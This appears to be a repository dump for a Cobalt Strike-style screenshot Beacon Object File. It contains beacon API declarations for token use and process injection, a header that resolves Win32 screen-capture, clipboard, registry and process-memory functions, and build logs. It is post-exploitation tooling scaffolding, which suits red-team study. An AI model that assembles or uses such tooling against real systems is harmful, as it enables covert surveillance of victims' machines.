#define CALLBACK_OUTPUT_UTF8 0x20
|
||||
|
||||
DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...);
|
||||
DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len);
|
||||
|
||||
/* Token Functions */
|
||||
DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token);
|
||||
DECLSPEC_IMPORT void BeaconRevertToken();
|
||||
DECLSPEC_IMPORT BOOL BeaconIsAdmin();
|
||||
|
||||
/* Spawn+Inject Functions */
|
||||
DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
|
||||
DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
|
||||
DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
|
||||
DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
|
||||
|
||||
/* Utility Functions */
|
||||
DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max);
|
|
@ -0,0 +1,361 @@
|
|||
#pragma once
|
||||
/* some code and/or ideas are from trustedsec SA Github repo -- thankyou trustedsec! */
|
||||
#include <windows.h>
|
||||
|
||||
|
||||
#ifdef BOF
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
#include "beacon.h"
|
||||
|
||||
void go(char* buff, int len);
|
||||
|
||||
/* resolve some extra funcs for the screenshot */
|
||||
|
||||
DECLSPEC_IMPORT DWORD WINAPI User32$MessageBoxA(HWND, LPCTSTR, LPCTSTR, UINT);
|
||||
#define MessageBoxCustom User32$MessageBoxA
|
||||
|
||||
DECLSPEC_IMPORT int WINAPI User32$GetSystemMetrics(int nIndex);
|
||||
#define GetSystemMetrics User32$GetSystemMetrics
|
||||
|
||||
DECLSPEC_IMPORT HDC WINAPI User32$GetDC(HWND hWnd);
|
||||
#define GetDC User32$GetDC
|
||||
|
||||
DECLSPEC_IMPORT HDC WINAPI GDI32$CreateCompatibleDC(HDC hdc);
|
||||
#define CreateCompatibleDC GDI32$CreateCompatibleDC
|
||||
|
||||
DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int cx, int cy);
|
||||
#define CreateCompatibleBitmap GDI32$CreateCompatibleBitmap
|
||||
|
||||
DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ h);
|
||||
#define SelectObject GDI32$SelectObject
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI GDI32$BitBlt(HDC hdc,
|
||||
int x,
|
||||
int y,
|
||||
int cx,
|
||||
int cy,
|
||||
HDC hdcSrc,
|
||||
int x1,
|
||||
int y1,
|
||||
DWORD rop);
|
||||
#define BitBlt GDI32$BitBlt
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI User32$OpenClipboard(HWND hWndNewOwner);
|
||||
#define OpenClipboard User32$OpenClipboard
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI User32$EmptyClipboard();
|
||||
#define EmptyClipboard User32$EmptyClipboard
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI User32$SetClipboardData(UINT uFormat, HANDLE hMem);
|
||||
#define SetClipboardData User32$SetClipboardData
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI User32$CloseClipboard();
|
||||
#define CloseClipboard User32$CloseClipboard
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI GDI32$DeleteDC(HDC hdc);
|
||||
#define DeleteDC GDI32$DeleteDC
|
||||
|
||||
DECLSPEC_IMPORT int WINAPI User32$ReleaseDC(HWND hWnd, HDC hDC);
|
||||
#define ReleaseDC User32$ReleaseDC
|
||||
|
||||
DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$DeleteObject(HGDIOBJ ho);
|
||||
#define DeleteObject GDI32$DeleteObject
|
||||
|
||||
|
||||
|
||||
/* End of function resolutions for screenshot */
|
||||
|
||||
/* Resolve some functions for writing BMP to disk*/
|
||||
|
||||
DECLSPEC_IMPORT HDC WINAPI GDI32$CreateDCA(LPCSTR pwszDriver,
|
||||
LPCSTR pwszDevice,
|
||||
LPCSTR pszPort,
|
||||
const DEVMODEA* pdm);
|
||||
#define CreateDCA GDI32$CreateDCA
|
||||
|
||||
DECLSPEC_IMPORT int WINAPI GDI32$GetDeviceCaps(HDC hdc,
|
||||
int index);
|
||||
#define GetDeviceCaps GDI32$GetDeviceCaps
|
||||
|
||||
DECLSPEC_IMPORT int WINAPI GDI32$GetObjectA(HANDLE h,
|
||||
int c,
|
||||
LPVOID pv);
|
||||
#define GetObjectA GDI32$GetObjectA
|
||||
DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalAlloc(
|
||||
UINT uFlags,
|
||||
SIZE_T dwBytes);
|
||||
#define GlobalAlloc KERNEL32$GlobalAlloc
|
||||
|
||||
DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$GlobalLock(HGLOBAL);
|
||||
#define GlobalLock KERNEL32$GlobalLock
|
||||
|
||||
DECLSPEC_IMPORT WINGDIAPI HGDIOBJ WINAPI GDI32$GetStockObject(int);
|
||||
#define GetStockObject GDI32$GetStockObject
|
||||
|
||||
DECLSPEC_IMPORT WINGDIAPI HPALETTE WINAPI GDI32$SelectPalette(HDC, HPALETTE, BOOL);
|
||||
#define SelectPalette GDI32$SelectPalette
|
||||
|
||||
DECLSPEC_IMPORT WINGDIAPI UINT WINAPI GDI32$RealizePalette(HDC);
|
||||
#define RealizePalette GDI32$RealizePalette
|
||||
|
||||
DECLSPEC_IMPORT WINGDIAPI int WINAPI GDI32$GetDIBits(HDC hdc,
|
||||
HBITMAP hbm,
|
||||
UINT start,
|
||||
UINT cLines,
|
||||
LPVOID lpvBits,
|
||||
LPBITMAPINFO lpbmi,
|
||||
UINT usage);
|
||||
#define GetDIBits GDI32$GetDIBits
|
||||
|
||||
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$GlobalUnlock(HGLOBAL);
|
||||
#define GlobalUnlock KERNEL32$GlobalUnlock
|
||||
|
||||
DECLSPEC_IMPORT WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalFree(HGLOBAL);
|
||||
#define GlobalFree KERNEL32$GlobalFree
|
||||
|
||||
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE);
|
||||
#define CloseHandle KERNEL32$CloseHandle
|
||||
|
||||
|
||||
|
||||
|
||||
/* End of function resolutions for writing BMP to disk */
|
||||
|
||||
|
||||
/* COM */
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCWSTR, LPCLSID);
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv);
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD);
|
||||
DECLSPEC_IMPORT VOID WINAPI OLE32$CoUninitialize();
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(LPWSTR lpsz, LPIID lpiid);
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved);
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID, IUnknown*, DWORD, COSERVERINFO*, DWORD, MULTI_QI*);
|
||||
DECLSPEC_IMPORT BSTR WINAPI OleAut32$SysAllocString(const OLECHAR*);
|
||||
DECLSPEC_IMPORT LPVOID WINAPI OLEAUT32$VariantInit(VARIANTARG* pvarg);
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE* asAuthSvc, void* pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void* pAuthList, DWORD dwCapabilities, void* pReserved3);
|
||||
|
||||
/* Registry */
|
||||
DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult);
|
||||
DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegDeleteTreeA(HKEY hKey, LPCSTR lpSubKey);
|
||||
DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired,
|
||||
CONST LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition);
|
||||
DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType,
|
||||
CONST BYTE* lpData, DWORD cbData);
|
||||
|
||||
|
||||
/* FileSystem */
|
||||
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
|
||||
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize);
|
||||
DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea, LPDWORD lpdwHandle);
|
||||
DECLSPEC_IMPORT BOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData);
|
||||
DECLSPEC_IMPORT BOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID* lplpBuffer, PUINT puLen);
|
||||
|
||||
|
||||
/* Memory */
|
||||
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
|
||||
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes);
|
||||
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t);
|
||||
DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t);
|
||||
|
||||
|
||||
/* Process */
|
||||
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
|
||||
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
|
||||
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap();
|
||||
DECLSPEC_IMPORT SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength);
|
||||
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesRead);
|
||||
DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds);
|
||||
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID);
|
||||
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid);
|
||||
DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize);
|
||||
|
||||
|
||||
/* GetLast Error */
|
||||
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID);
|
||||
|
||||
|
||||
/* Directories */
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$RemoveDirectoryA(LPCSTR);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName);
|
||||
DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathIsDirectoryA(LPCSTR);
|
||||
DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath);
|
||||
|
||||
|
||||
/* strings */
|
||||
DECLSPEC_IMPORT PSTR WINAPI SHLWAPI$StrChrA(PCSTR pszStart, WORD wMatch);
|
||||
DECLSPEC_IMPORT LPSTR __cdecl MSVCRT$strchr(LPSTR, int);
|
||||
DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcat_s(LPSTR, size_t, LPCSTR);
|
||||
DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcpy_s(LPSTR, size_t, LPCSTR);
|
||||
DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strncpy_s(LPSTR, size_t, LPCSTR, size_t);
|
||||
DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(LPSTR, size_t, LPCSTR, ...);
|
||||
DECLSPEC_IMPORT void WINAPI MSVCRT$sprintf(char*, char[], ...);
|
||||
DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list);
|
||||
DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR);
|
||||
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2);
|
||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
|
||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2);
|
||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength);
|
||||
DECLSPEC_IMPORT int WINAPI KERNEL32$lstrlenW(LPCWSTR lpString);
|
||||
DECLSPEC_IMPORT LPWSTR WINAPI KERNEL32$lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2);
|
||||
|
||||
|
||||
/* RPC */
|
||||
DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$RpcStringFreeA(RPC_CSTR* String);
|
||||
DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidCreate(UUID* Uuid);
|
||||
DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidToStringA(const UUID* Uuid, RPC_CSTR* StringUuid);
|
||||
|
||||
|
||||
/* Random */
|
||||
DECLSPEC_IMPORT void WINAPI MSVCRT$srand(int initial);
|
||||
DECLSPEC_IMPORT int WINAPI MSVCRT$rand();
|
||||
|
||||
|
||||
/* DateTime */
|
||||
DECLSPEC_IMPORT time_t WINAPI MSVCRT$time(time_t* time);
|
||||
|
||||
|
||||
/* SystemInfo */
|
||||
DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature);
|
||||
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBuffer);
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
|
||||
|
||||
/* helper macros */
|
||||
|
||||
#define malloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) /* trustedsec */
|
||||
#define free(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, (LPVOID)addr) /* trustedsec */
|
||||
#define ZeroMemory(address, size) memset(address, 0, size);
|
||||
|
||||
|
||||
/* ----------------------------------- DEFINITIONS ------------------------------------------*/
|
||||
|
||||
/* COM */
|
||||
#define CLSIDFromString OLE32$CLSIDFromString
|
||||
#define CoCreateInstance OLE32$CoCreateInstance
|
||||
#define CoInitializeEx OLE32$CoInitializeEx
|
||||
#define CoUninitialize OLE32$CoUninitialize
|
||||
#define IIDFromString OLE32$IIDFromString
|
||||
#define CoInitialize OLE32$CoInitialize
|
||||
#define CoCreateInstanceEx OLE32$CoCreateInstanceEx
|
||||
#define SysAllocString OleAut32$SysAllocString
|
||||
#define VariantInit OLEAUT32$VariantInit
|
||||
#define CoInitialize OLE32$CoInitialize
|
||||
#define CoInitializeSecurity OLE32$CoInitializeSecurity
|
||||
|
||||
/* memory */
|
||||
#define HeapFree KERNEL32$HeapFree
|
||||
#define HeapAlloc KERNEL32$HeapAlloc
|
||||
#define HeapReAlloc KERNEL32$HeapReAlloc
|
||||
#define memcpy MSVCRT$memcpy
|
||||
#define memset MSVCRT$memset
|
||||
|
||||
|
||||
/* process */
|
||||
#define GetProcessHeap KERNEL32$GetProcessHeap
|
||||
#define CreateProcessWithLogonW ADVAPI32$CreateProcessWithLogonW
|
||||
#define OpenProcess KERNEL32$OpenProcess
|
||||
#define VirtualQueryEx KERNEL32$VirtualQueryEx
|
||||
#define GetProcessId KERNEL32$GetProcessId
|
||||
#define ReadProcessMemory KERNEL32$ReadProcessMemory
|
||||
#define GetCurrentProcess KERNEL32$GetCurrentProcess
|
||||
#define Sleep KERNEL32$Sleep
|
||||
#define LookupPrivilegeValueW ADVAPI32$LookupPrivilegeValueW
|
||||
#define GetModuleFileNameExW PSAPI$GetModuleFileNameExW
|
||||
|
||||
|
||||
/* debug */
|
||||
#define EnumerateLoadedModulesW64 DBGHELP$EnumerateLoadedModulesW64
|
||||
#define SymInitializeW DBGHELP$SymInitializeW
|
||||
#define SymCleanup DBGHELP$SymCleanup
|
||||
|
||||
|
||||
/* filesystem */
|
||||
#define CreateFileA KERNEL32$CreateFileA
|
||||
#define SetFilePointer KERNEL32$SetFilePointer
|
||||
#define SetFilePointerEx KERNEL32$SetFilePointerEx
|
||||
#define WriteFile KERNEL32$WriteFile
|
||||
#define GetFileSizeEx KERNEL32$GetFileSizeEx
|
||||
#define GetFileVersionInfoSizeW VERSION$GetFileVersionInfoSizeW
|
||||
#define GetFileVersionInfoW VERSION$GetFileVersionInfoW
|
||||
#define VerQueryValueW VERSION$VerQueryValueW
|
||||
|
||||
/* error */
|
||||
#define GetLastError KERNEL32$GetLastError
|
||||
|
||||
|
||||
/* registry */
|
||||
#define RegOpenKeyExA ADVAPI32$RegOpenKeyExA
|
||||
#define RegDeleteTreeA ADVAPI32$RegDeleteTreeA
|
||||
#define RegCreateKeyExA ADVAPI32$RegCreateKeyExA
|
||||
#define RegSetValueExA ADVAPI32$RegSetValueExA
|
||||
|
||||
|
||||
/* directory */
|
||||
#define RemoveDirectoryA KERNEL32$RemoveDirectoryA
|
||||
#define CreateDirectoryA KERNEL32$CreateDirectoryA
|
||||
#define MoveFileA KERNEL32$MoveFileA
|
||||
#define PathIsDirectoryA SHLWAPI$PathIsDirectoryA
|
||||
#define PathFileExistsA SHLWAPI$PathFileExistsA
|
||||
|
||||
|
||||
/* strings */
|
||||
#define strchr MSVCRT$strchr
|
||||
#define strcat_s MSVCRT$strcat_s
|
||||
#define strcpy_s MSVCRT$strcpy_s
|
||||
#define strncpy_s MSVCRT$strncpy_s
|
||||
#define snprintf MSVCRT$_snprintf /*beacon can't find snprintf without the preceeding '_' */
|
||||
#define wcslen MSVCRT$wcslen
|
||||
#define vsnprintf MSVCRT$vsnprintf
|
||||
#define lstrlenW KERNEL32$lstrlenW
|
||||
#define lstrcpyW KERNEL32$lstrcpyW
|
||||
#define strcmp MSVCRT$strcmp
|
||||
#define lstrcpyA Kernel32$lstrcpyA
|
||||
#define lstrcatA Kernel32$lstrcatA
|
||||
#define lstrcpynA Kernel32$lstrcpynA
|
||||
#define lstrlenW KERNEL32$lstrlenW
|
||||
#define lstrcpyW KERNEL32$lstrcpyW
|
||||
#define sprintf MSVCRT$sprintf
|
||||
|
||||
|
||||
/* RPC */
|
||||
#define RpcStringFreeA Rpcrt4$RpcStringFreeA
|
||||
#define UuidCreate Rpcrt4$UuidCreate
|
||||
#define UuidToStringA Rpcrt4$UuidToStringA
|
||||
|
||||
|
||||
/* Random */
|
||||
#define srand MSVCRT$srand
|
||||
#define rand MSVCRT$rand
|
||||
|
||||
|
||||
/* DateTime */
|
||||
#define time MSVCRT$time
|
||||
|
||||
|
||||
/* SystemInfo */
|
||||
#define GetSystemInfo KERNEL32$GetSystemInfo
|
||||
#define GetUserNameW ADVAPI32$GetUserNameW
|
||||
#define IsProcessorFeaturePresent KERNEL32$IsProcessorFeaturePresent
|
||||
|
||||
#else
|
||||
|
||||
#endif
|
|
@ -0,0 +1,23 @@
|
|||
Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x64
|
||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
||||
|
||||
cl /c /D BOF /GS- /Fo"intermediary\BOF\x64\\" /TP /c /Fo"intermediary\BOF\x64\source" Source.cpp
|
||||
cl : Command line warning D9025: overriding '/Fointermediary\BOF\x64\' with '/Fointermediary\BOF\x64\source'
|
||||
|
||||
Source.cpp
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
|
||||
C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj
|
||||
1 File(s) copied
|
||||
enumerating sections...
|
||||
found debug section.. zeroing it...
|
||||
closing stream...
|
||||
done!
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,2 @@
|
|||
PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0:
|
||||
BOF|x64|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\|
|
|
@ -0,0 +1,5 @@
|
|||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\source.obj
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x64.obj
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.command.1.tlog
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.read.1.tlog
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.write.1.tlog
|
|
@ -0,0 +1,7 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project>
|
||||
<ProjectOutputs>C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx64</ProjectOutputs>
|
||||
<ContentFiles></ContentFiles>
|
||||
<SatelliteDlls></SatelliteDlls>
|
||||
<NonRecipeFileRefs></NonRecipeFileRefs>
|
||||
</Project>
|
Binary file not shown.
|
@ -0,0 +1,23 @@
|
|||
Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x86
|
||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
||||
|
||||
cl /c /Oy- /D BOF /GS- /Fo"intermediary\BOF\x86\\" /TP /analyze- /c /Fo"intermediary\BOF\x86\source" Source.cpp
|
||||
cl : Command line warning D9025: overriding '/Fointermediary\BOF\x86\' with '/Fointermediary\BOF\x86\source'
|
||||
|
||||
Source.cpp
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
|
||||
C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj
|
||||
1 File(s) copied
|
||||
enumerating sections...
|
||||
found debug section.. zeroing it...
|
||||
closing stream...
|
||||
done!
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,2 @@
|
|||
PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0:
|
||||
BOF|Win32|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\|
|
|
@ -0,0 +1,5 @@
|
|||
